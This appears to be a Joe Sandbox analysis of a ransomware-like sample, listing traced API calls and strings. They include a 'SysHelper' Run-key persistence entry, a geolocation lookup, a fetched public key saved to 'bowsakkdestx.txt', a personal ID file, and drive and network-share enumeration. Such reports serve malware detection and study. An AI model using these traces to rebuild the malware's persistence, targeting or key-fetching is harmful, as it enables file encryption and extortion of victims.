                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                        • API String ID: 1485416377-933853286
                                                                                                                                                                        • Opcode ID: ba2daf5dd8f270bc522c83e7b24723de66fc098c0532afadc059025b54515924
                                                                                                                                                                        • Instruction ID: 8c3f939554028bdcb460ee0cc2b19c665ca51b2f442570f95020cadd565d385e
                                                                                                                                                                        • Opcode Fuzzy Hash: ba2daf5dd8f270bc522c83e7b24723de66fc098c0532afadc059025b54515924
                                                                                                                                                                        • Instruction Fuzzy Hash: E2919E71D002589FEF20CFA4CD49BEEBBF4AF15704F2041A8E4057B291D7B65A88CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00BABB49
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00BABBBA
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BABBE4
                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00BABBF4
                                                                                                                                                                        • _free.LIBCMT ref: 00BABCD7
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                          • Part of subcall function 00BA1CD0: _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                          • Part of subcall function 00BA1CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                          • Part of subcall function 00BA1CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • IsWindow.USER32(?), ref: 00BABF69
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BABF7B
                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00BABFA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                        • Opcode ID: bc05bd004bf84667f72e8ca3da8010f41ec91a5b0820723a18cd34f508a514cc
                                                                                                                                                                        • Instruction ID: bb56e5a441537d8d801f308c69661b8fa493555c606e65308cf7c1279daf3bca
                                                                                                                                                                        • Opcode Fuzzy Hash: bc05bd004bf84667f72e8ca3da8010f41ec91a5b0820723a18cd34f508a514cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C1BE7150C3809FDB20DF28D845BAABBE4FF86314F144A6DF498972A2D7769844CB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BB35B1
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB364A
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB3680
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00BB369D
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB36F3
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB370F
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB3726
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3744
                                                                                                                                                                        • __allrem.LIBCMT ref: 00BB375B
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BB3779
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction ID: 28060a13275d1e9354f3e82df437614ccc85bc7fd4cfd4f32046b7a6c076b34e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                        • Instruction Fuzzy Hash: BD7196B1A00716ABD7249E79CC81FFAB3E8EF54724F1442BAF514D6681EBB0DE408790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB0FDD: __wfsopen.LIBCMT ref: 00BB0FE8
                                                                                                                                                                        • _fgetws.LIBCMT ref: 00B9C7BC
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9C89F
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00B9C94B
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                        • Opcode ID: e2f95293b8fd4dae01ae3653216e4dbfea79cde6997f3addd0ea110eb12c9469
                                                                                                                                                                        • Instruction ID: b1c9ced61109202d6031c884d03ece7bce39d7a48d840be3a2c3e63d0e65c5f6
                                                                                                                                                                        • Opcode Fuzzy Hash: e2f95293b8fd4dae01ae3653216e4dbfea79cde6997f3addd0ea110eb12c9469
                                                                                                                                                                        • Instruction Fuzzy Hash: CA918D72D002199BDF21DFA8CC857EEBBF5EF14304F1405B9E809A7241E776AA44CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00B9F338
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00B9F353
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                        • Opcode ID: 204ddf31b400b9ac98b0a91636a7e2ef4cfb480edc4e8a32bf28ef9d945b3fcc
                                                                                                                                                                        • Instruction ID: f2e2d3af344797642c78ca24b093f7b51176a30ab4c4fa880a31cb25e96253e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 204ddf31b400b9ac98b0a91636a7e2ef4cfb480edc4e8a32bf28ef9d945b3fcc
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CC15A71D0120AEBDF10DFA4DD89BEEBBF5BF14318F104069E405A7250EBB5AA58CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00BAE6D4), ref: 00B9C6C2
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00B9C725
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C72E
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                        • Opcode ID: 615d6e83b1974852fc2fb5cd6358e5c924535fe957c7d73d1b27739e1966299f
                                                                                                                                                                        • Instruction ID: 2346b984c533fb4e8e852bcb6e57e54bb5c6bd7e78420c09213aaa71a9475fdf
                                                                                                                                                                        • Opcode Fuzzy Hash: 615d6e83b1974852fc2fb5cd6358e5c924535fe957c7d73d1b27739e1966299f
                                                                                                                                                                        • Instruction Fuzzy Hash: 60111B75A40308FFDF119F90DC46BEEBBB8EB04719F1041A5EA10B21A1D7B15A54AB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                        • Opcode ID: a11c5f0be8447ea3a5e81e7e9b8b09d7eeb4158ac31f07f1dfa86f9f9c1203f8
                                                                                                                                                                        • Instruction ID: 3769bf816cf593b17960dbb37306e30f499aa58a5243b467f9003c230633148c
                                                                                                                                                                        • Opcode Fuzzy Hash: a11c5f0be8447ea3a5e81e7e9b8b09d7eeb4158ac31f07f1dfa86f9f9c1203f8
                                                                                                                                                                        • Instruction Fuzzy Hash: EB018C3044C385ABDA30DF209C49BDF7BD8AF52704F0448A9B98492182EB70E608C7A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,00BAEE2F), ref: 00BA1B1E
                                                                                                                                                                        • timeGetTime.WINMM(?,?,00BAEE2F), ref: 00BA1B29
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B4C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BA1B5C
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B6A
                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,00BAEE2F), ref: 00BA1B72
                                                                                                                                                                        • timeGetTime.WINMM(?,?,00BAEE2F), ref: 00BA1B78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                        • Opcode ID: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction ID: 0cb07de317dcffcf08b9e1cad4acd3065fc147a94c6bae8da69ede8c1afb327c
                                                                                                                                                                        • Opcode Fuzzy Hash: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01D436A41318AADB20A7E98C81FEDB3ACFB08B41F4400A5F700B70D0E670A940CBF5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00B9C51B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C539
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: f1e6267cee75fd78aa130fb857c65a40cb0c1cc322d96fe9f44a6220cb459538
                                                                                                                                                                        • Instruction ID: f151ff7700744b2f6806ed15c7c402b583f24147f224ea039344d6bb9e67df28
                                                                                                                                                                        • Opcode Fuzzy Hash: f1e6267cee75fd78aa130fb857c65a40cb0c1cc322d96fe9f44a6220cb459538
                                                                                                                                                                        • Instruction Fuzzy Hash: DA11E7B2A4032833DD2075696C87FEF77DCDB55B21F4100F6FA0CD2142E5A6955542E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00BABABE
                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 00BABAC5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00BA0C12
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00BA0C39
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA0C4C
                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00BA0C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00BA0A75
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00C90234,00000002), ref: 00BA0AE2
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00BA0AF9
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BA0B02
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00BA0B1B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00B9F125
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00B9F198
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00B9F1A1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B9F1A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1421093161-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00BAB1BA
                                                                                                                                                                          • Part of subcall function 00BA11C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00BA120F
                                                                                                                                                                          • Part of subcall function 00BA11C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00BA1228
                                                                                                                                                                          • Part of subcall function 00BA11C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA123D
                                                                                                                                                                          • Part of subcall function 00BA11C0: MoveFileW.KERNEL32(00000000,?), ref: 00BA1277
                                                                                                                                                                          • Part of subcall function 00BABA10: LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                          • Part of subcall function 00BABA10: RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                          • Part of subcall function 00BABA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BAB4B3
                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00BAB4CD
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAB4D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                                                        • Opcode ID: 4d8e60baf3f931dd73ab9f8d3e8486bbb4dba0becaa3059cb9d4123506691675
                                                                                                                                                                        • Instruction ID: 6e6b1451aefaedc85b797c333aa41b5d1618fd42510aef7ff4e25ed6207e1ef0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d8e60baf3f931dd73ab9f8d3e8486bbb4dba0becaa3059cb9d4123506691675
                                                                                                                                                                        • Instruction Fuzzy Hash: B011E072D003059BDF31EF68DC467AE7BE0EF10318F1006B9EC5A56191E3B69A248BD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BB3B82
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BB3B97
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3074076210-0
                                                                                                                                                                        • Opcode ID: 2bc95b4c469271091b3fb7e5239be8cace69adafee6b6fd238f5bab2a9b3c300
                                                                                                                                                                        • Instruction ID: e226e3c382dc82a2cbd73ac92b9c58fdeb116de7ba92421f2999d215289a2643
                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc95b4c469271091b3fb7e5239be8cace69adafee6b6fd238f5bab2a9b3c300
